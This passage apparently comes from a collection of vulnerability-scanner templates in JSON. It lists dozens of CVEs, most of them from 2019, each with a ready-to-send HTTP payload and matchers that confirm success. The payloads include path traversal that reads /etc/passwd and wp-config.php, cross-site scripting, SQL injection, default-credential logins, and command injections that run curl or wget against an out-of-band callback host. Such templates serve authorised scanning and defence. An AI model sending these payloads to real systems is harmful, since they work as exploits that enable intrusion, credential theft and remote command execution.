/wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ClickDesk Live Support - Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nkeys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","!contains(body_1, \"phpinfo\")","contains_all(body_2, \"phpinfo\",\"PHP Version\")"],"condition":"and"}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Visualizer","Tested up to:"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/checklist/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Checklist","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-9632","info":{"name":"ESAFENET CDG - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/CDGServer3/ClientAjax"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["<servlet-name>CDGPermissions</servlet-name>"]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains_any(body, \"\\\"users\\\":\",\"\\\"usuario\\\":\")","contains_all(body, \"\\\"total\\\":\", \"\\\"header\\\":\")","status_code == 200 || status_code == 404"],"condition":"and"},{"type":"word","part":"body","words":["total\":0"],"negative":true}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15829","info":{"name":"Gallery Photoblocks < 1.1.43 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"post galleries!\")"],"condition":"and"}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/userpro/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" 